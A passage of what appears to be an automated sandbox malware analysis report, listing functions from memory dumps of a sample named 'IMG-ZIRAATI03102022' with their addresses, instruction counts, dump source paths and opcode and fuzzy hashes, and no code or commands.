                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 972afd8591d84e67fa587202d30962b4beacb025e13161c5b0c02469e76c9c2e
                                                                                                                              • Instruction ID: c552f937d5a1e867e4d4f4c8d5f8e57537a6dd851eddafe972794db5331be136
                                                                                                                              • Opcode Fuzzy Hash: 972afd8591d84e67fa587202d30962b4beacb025e13161c5b0c02469e76c9c2e
                                                                                                                              • Instruction Fuzzy Hash: C03177313162605F8756A738942456E7FE6EFC390430A80AEE90BCF792CF219C09C7E6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060675C1 Relevance: .1, Instructions: 118COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3999ac2174d187e0a0e5d4280365290e9c8c0f124f94bfa52aed834c85c2989c
                                                                                                                              • Instruction ID: a7db97301f0fd57ce1ffaa5f82488714b5e3d91f686d9c926aa2d4543870ec38
                                                                                                                              • Opcode Fuzzy Hash: 3999ac2174d187e0a0e5d4280365290e9c8c0f124f94bfa52aed834c85c2989c
                                                                                                                              • Instruction Fuzzy Hash: 8F418C35E50219DFCB54CFA5C9449AEBBF6FF88304F118169E806AB354DB70A986CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060675D0 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fa0fed33ac32d266a7e8ce34c14a3aeda979c9948c85c8fa0305a45354999208
                                                                                                                              • Instruction ID: 2b603b11f4f9198bf08cb604441cc1d2061003fbef055f9574ca022e4d4bb80c
                                                                                                                              • Opcode Fuzzy Hash: fa0fed33ac32d266a7e8ce34c14a3aeda979c9948c85c8fa0305a45354999208
                                                                                                                              • Instruction Fuzzy Hash: 4C417E35E50219CFCB54DFA5C94499EBBF6FF88304F118169E806AB354EB70A986CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06068990 Relevance: .1, Instructions: 99COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65675b748d86bb68a3b629a267cac01e17a266106a683b3492de4ff540861288
                                                                                                                              • Instruction ID: 7495d9beed58d1f70e5d2d52711a16e8ec7c62d2ceb472031fd9657373e3541a
                                                                                                                              • Opcode Fuzzy Hash: 65675b748d86bb68a3b629a267cac01e17a266106a683b3492de4ff540861288
                                                                                                                              • Instruction Fuzzy Hash: CA312E30D492918FD7A1CB2998046AABFF1EF82205F1CC59BE4948B552C375C94ACBB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06066F77 Relevance: .1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8cc5cdfaa8c2914a805c8a62b654ec49e5e843076b753105492be6316d933f58
                                                                                                                              • Instruction ID: 1fbabd7aad6a428cd2197becd9df8d50172e46b1a8acfe8423297a498d45d56a
                                                                                                                              • Opcode Fuzzy Hash: 8cc5cdfaa8c2914a805c8a62b654ec49e5e843076b753105492be6316d933f58
                                                                                                                              • Instruction Fuzzy Hash: 2531EF71A01645CFD754CF79C444AAEFFF1EF89314F24889EE0899BA12D731A985CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060034 Relevance: .1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b74e9c51aab8e9af2528c04de5f04552935db27e6a69680ac9ff96e44f519a29
                                                                                                                              • Instruction ID: d1686470c2d3a8580589db8917d028db6f3ed43eb12fb95fa30e9f5730f75791
                                                                                                                              • Opcode Fuzzy Hash: b74e9c51aab8e9af2528c04de5f04552935db27e6a69680ac9ff96e44f519a29
                                                                                                                              • Instruction Fuzzy Hash: DD418C34A402058FDB04DF64C458AAE7BF2AF88314F1585A9E406AB3A1CB71AD45CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606251E Relevance: .1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c18a5d8fec7654f69c63e12f916fa137f62a31d1aa1a6187d9ca856377fbb46d
                                                                                                                              • Instruction ID: 4d7aef66bcc94f11e3bfbf499a88c0f5a6d16e7ffd724b8e70785f8317f873e3
                                                                                                                              • Opcode Fuzzy Hash: c18a5d8fec7654f69c63e12f916fa137f62a31d1aa1a6187d9ca856377fbb46d
                                                                                                                              • Instruction Fuzzy Hash: 39317A75E002199FCF19CFA4D850AAEFBB2FF48311F00852AE912B3250CB359990CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06062308 Relevance: .1, Instructions: 92COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e757cf22ab81cb36780b862bcd49af5774f2f147f0dfe54c877e9bb86d9f5111
                                                                                                                              • Instruction ID: b8df31d5c87fc6b12eda8ae9cdcf15a8353dbf43a5c316be9fbe8afac2cf89d5
                                                                                                                              • Opcode Fuzzy Hash: e757cf22ab81cb36780b862bcd49af5774f2f147f0dfe54c877e9bb86d9f5111
                                                                                                                              • Instruction Fuzzy Hash: D421EF32B442198FCB94DB5AE040A6ABBE5FB95221B18C0A7F20DCB611D731E981CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060040 Relevance: .1, Instructions: 91COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cad36a1b5fca71d240ec4b22878dda3387df861721badfc44bdb4353f0ec6c36
                                                                                                                              • Instruction ID: 4c1860e7264753a2357901faf639b259a2a6b238ac8b797a67090f78d48a4dff
                                                                                                                              • Opcode Fuzzy Hash: cad36a1b5fca71d240ec4b22878dda3387df861721badfc44bdb4353f0ec6c36
                                                                                                                              • Instruction Fuzzy Hash: 47315B34A402058FDB14DF64C558AAE7BF2AF88314F1185A8E506AB360DB71AD85CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606E0E0 Relevance: .1, Instructions: 89COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: de59ac37202a664cfae78c6e2bfc2408aaaad026c3f90f4331952244d888c02d
                                                                                                                              • Instruction ID: 1188c20c1c8e0dff568473eb27d55e540d7abb2fecbcc09762e7a19803be315c
                                                                                                                              • Opcode Fuzzy Hash: de59ac37202a664cfae78c6e2bfc2408aaaad026c3f90f4331952244d888c02d
                                                                                                                              • Instruction Fuzzy Hash: D12148317483515FE354A739DC10BAABBDAAF86610F1681BAF209CF392CD74DC0683A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606E1E0 Relevance: .1, Instructions: 86COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 21fc1c73496e90680108ad0bd75a8c31265c7a6a5218cc6d90854d53162f6ed3
                                                                                                                              • Instruction ID: 6bd3aff62b021cb7b796977bc2a77f1cf4c6fd37e0df6a7ae8cf6b8ebfd15fd1
                                                                                                                              • Opcode Fuzzy Hash: 21fc1c73496e90680108ad0bd75a8c31265c7a6a5218cc6d90854d53162f6ed3
                                                                                                                              • Instruction Fuzzy Hash: 87210836B583218FC7D4976AE8148AABFE6DF8513431680BBF516CB351CA708C4187E2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BC20 Relevance: .1, Instructions: 80COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c19638a2564220f94bf5be5b4f66e7c92846c66cc143dd42af09436048ea4d7
                                                                                                                              • Instruction ID: f8820cb7451f1b5295abc3e4d6b5d01e41d2890fa013b6c4cf9e7fe8e6186ffb
                                                                                                                              • Opcode Fuzzy Hash: 1c19638a2564220f94bf5be5b4f66e7c92846c66cc143dd42af09436048ea4d7
                                                                                                                              • Instruction Fuzzy Hash: 58314174E40605CFD794DF59C880AAEBBF2FF88314F118469E506AB361DB70AD41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064CB0 Relevance: .1, Instructions: 80COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b17081db6f675225c2ff88065eb955ae2b0a17128a810d837cf9ad7923e53ed9
                                                                                                                              • Instruction ID: 3b4ceed40d996e48fcd702ae23b31d62654286f935d8b484e73f87993a9c9806
                                                                                                                              • Opcode Fuzzy Hash: b17081db6f675225c2ff88065eb955ae2b0a17128a810d837cf9ad7923e53ed9
                                                                                                                              • Instruction Fuzzy Hash: 9F212170A45241DFE745DF39C418A6A7FF1AF8A210B0584ADE006DB7A1CB74EC84CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064B78 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4fd60af593e0dd8abbc87a49af83691142837b45ba78fd8dc5b01d767a13faa
                                                                                                                              • Instruction ID: d299a56babcc8388657a5ef3065d34e4274b7708983f5b0eeb6327ad991ff556
                                                                                                                              • Opcode Fuzzy Hash: d4fd60af593e0dd8abbc87a49af83691142837b45ba78fd8dc5b01d767a13faa
                                                                                                                              • Instruction Fuzzy Hash: 32219E30E40229DFDB94CBA6D554BEEBFF5AB48714F108029E502BB340CB769E44CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06068229 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cecd7d7e5db13dc872234621aa80087b302ef4cbc1e799e0df0e4e4e4edce845
                                                                                                                              • Instruction ID: 544c84620a0471dad1c65d41cf31e3e4688d6fb72675c2473cd7ca414f722d28
                                                                                                                              • Opcode Fuzzy Hash: cecd7d7e5db13dc872234621aa80087b302ef4cbc1e799e0df0e4e4e4edce845
                                                                                                                              • Instruction Fuzzy Hash: 05218035A40525DFDF948AA5DC45BEE7BF0BF48250F10816AE505EB360D7349C41CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060602F8 Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e7de458c86ee7dcc363fa631255a2f8cab833d1f4b1203d9757cc560b143ae3c
                                                                                                                              • Instruction ID: 1001d7f9b503b248b909dd16a4166413b30090d0c95724dc71d92475e7530e62
                                                                                                                              • Opcode Fuzzy Hash: e7de458c86ee7dcc363fa631255a2f8cab833d1f4b1203d9757cc560b143ae3c
                                                                                                                              • Instruction Fuzzy Hash: CE1100307142508FC359EB78D814A6F7BE6AFCA224B1545BED02ACB3A1CE709C09C792
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606245E Relevance: .1, Instructions: 65COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f8feb9ade823de659389d967deb0f12ebe7d62c942de1bba863a0697907a5ae2
                                                                                                                              • Instruction ID: d2843cb6f8117b48eeabcd0bf2420a90119a296c8b9f802f02e40ed97d6f98cd
                                                                                                                              • Opcode Fuzzy Hash: f8feb9ade823de659389d967deb0f12ebe7d62c942de1bba863a0697907a5ae2
                                                                                                                              • Instruction Fuzzy Hash: 1A21F775B01214AFCB08EFA8D6848AEBBF7FF8C240B158529E51AE7354DB349D41DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06066FC8 Relevance: .1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d29a864d997a1524ebfbc4864768b548f431e753e4a420c3a6f6f6a281b3dc1
                                                                                                                              • Instruction ID: 4b30587f10d28deacbc1278db247bac4d6219733aef7f3006358aba61c7fa0e5
                                                                                                                              • Opcode Fuzzy Hash: 6d29a864d997a1524ebfbc4864768b548f431e753e4a420c3a6f6f6a281b3dc1
                                                                                                                              • Instruction Fuzzy Hash: B7213C71D00608DFDB50CFAAC584A9AFBF2EF88314F648959E089A7710D331A980CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067DE8 Relevance: .1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c9260d27d5d2c743ae65ce4fc2a66d8c6d883eefb5d0eda4231128c61c62339
                                                                                                                              • Instruction ID: 0faa53c258a61a76b367c1e5f91e0862847342394d1e0e12cdf496749c4d7df7
                                                                                                                              • Opcode Fuzzy Hash: 7c9260d27d5d2c743ae65ce4fc2a66d8c6d883eefb5d0eda4231128c61c62339
                                                                                                                              • Instruction Fuzzy Hash: B6212535A602099FDF50DFA1E895AEDBBB1FF48319F104065F501EB260EB34D988CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060C38 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cf7609ee839ae950a4cb597e51956828fbb0fcbcce8e0250cac5002917406f6d
                                                                                                                              • Instruction ID: fb5de945f5c0e7aa482ea649c1d766523914a547446f4dd82530a9aa7e52e6f8
                                                                                                                              • Opcode Fuzzy Hash: cf7609ee839ae950a4cb597e51956828fbb0fcbcce8e0250cac5002917406f6d
                                                                                                                              • Instruction Fuzzy Hash: F21123317652459FC754ABB8C9116393BE59F82624F1401FAE00ACF3E2DA709C05CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06060308 Relevance: .1, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6445dfea385c805cb0af7c6de4f807edf99285fe7726aff2bf2044bbc4c3ea46
                                                                                                                              • Instruction ID: 525a4d904a6f562244ef87bf8789a2d3d3ab8a629643c5b25da46a5611c0503e
                                                                                                                              • Opcode Fuzzy Hash: 6445dfea385c805cb0af7c6de4f807edf99285fe7726aff2bf2044bbc4c3ea46
                                                                                                                              • Instruction Fuzzy Hash: 2E11E0313142108FC358EB79D858A6F7BEAAFC9214B05487DE11ACB790CF70AC0887E2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067066 Relevance: .1, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8b2797a3772cd64be0b8ce8dbe334bb4a26e86beafb5ab4f42a57a613ebd583c
                                                                                                                              • Instruction ID: 9ce9fa7a45eb8dd9d8554506e122f6dfd919eca003c4622ceb5a9179442d3d50
                                                                                                                              • Opcode Fuzzy Hash: 8b2797a3772cd64be0b8ce8dbe334bb4a26e86beafb5ab4f42a57a613ebd583c
                                                                                                                              • Instruction Fuzzy Hash: 95216D31A44644CFE760CB7AD544BAAFBF2AF84308F248959E18697651D731EC80CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606F0EC Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 428bf0a8170d97b560463de68da19770998b4ceb5d9f152a9d895c6659b81293
                                                                                                                              • Instruction ID: f9b77ba406b1549d77472c90941f31707939bfe97619ca244c68dfcabad60eae
                                                                                                                              • Opcode Fuzzy Hash: 428bf0a8170d97b560463de68da19770998b4ceb5d9f152a9d895c6659b81293
                                                                                                                              • Instruction Fuzzy Hash: B4213B70A4520ADFEF40DFA4E895BAEBBB2BF49354F104425E506BF250DB756A40CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06062898 Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee9499184899536637eb86425979667bb8111c452c453683b3fe8c2767264184
                                                                                                                              • Instruction ID: 105928a06bb098dfef7b6e16574ff9f0ec37922a4efcc9a0d93fd978bce4190a
                                                                                                                              • Opcode Fuzzy Hash: ee9499184899536637eb86425979667bb8111c452c453683b3fe8c2767264184
                                                                                                                              • Instruction Fuzzy Hash: 1301F2323412006FD714A6B9F880B6AB7DBEBC92A5B14813EE31EC7680CB71EC058390
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606DD88 Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 04a3258b7d9bc826b93b5b690dda21a5f067d3dce15fe0d347d8575ab59d1c1c
                                                                                                                              • Instruction ID: 3e9f1c787cffadf1ac952f72222265d0580b030d415b7ee94e2646caa147b69a
                                                                                                                              • Opcode Fuzzy Hash: 04a3258b7d9bc826b93b5b690dda21a5f067d3dce15fe0d347d8575ab59d1c1c
                                                                                                                              • Instruction Fuzzy Hash: 4501B5357902518FDBD56636DC106BA6FE69FD1220B1AC16AE805CF2A1DA708C418BD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06061AF8 Relevance: .1, Instructions: 52COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6fa1fb56dfa07c840ea49e42ad9dcee87642e29a3717e4364e25603cdfe69ec9
                                                                                                                              • Instruction ID: e8a81a19bb2048103f10dc0041dabb853809146ea02e4be87526b0afeec4cd40
                                                                                                                              • Opcode Fuzzy Hash: 6fa1fb56dfa07c840ea49e42ad9dcee87642e29a3717e4364e25603cdfe69ec9
                                                                                                                              • Instruction Fuzzy Hash: 95016833600210AFC7124F258840A6B7FF6EF89261F1980AAF60587651C336CC12DBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060F16AB Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425304499.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_60f0000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 87744edf37d437aa94ac00182015eb06dca38a55175a72f060517595e20a00d8
                                                                                                                              • Instruction ID: b4afa1deb3f454beedf710974857fb3a32781c35be03ea23456e2f7cab3a7403
                                                                                                                              • Opcode Fuzzy Hash: 87744edf37d437aa94ac00182015eb06dca38a55175a72f060517595e20a00d8
                                                                                                                              • Instruction Fuzzy Hash: 84113234D11359CFDB55DB60CA54AEDFFF2BF88200F1884AAC049BB551DB315845CBA1
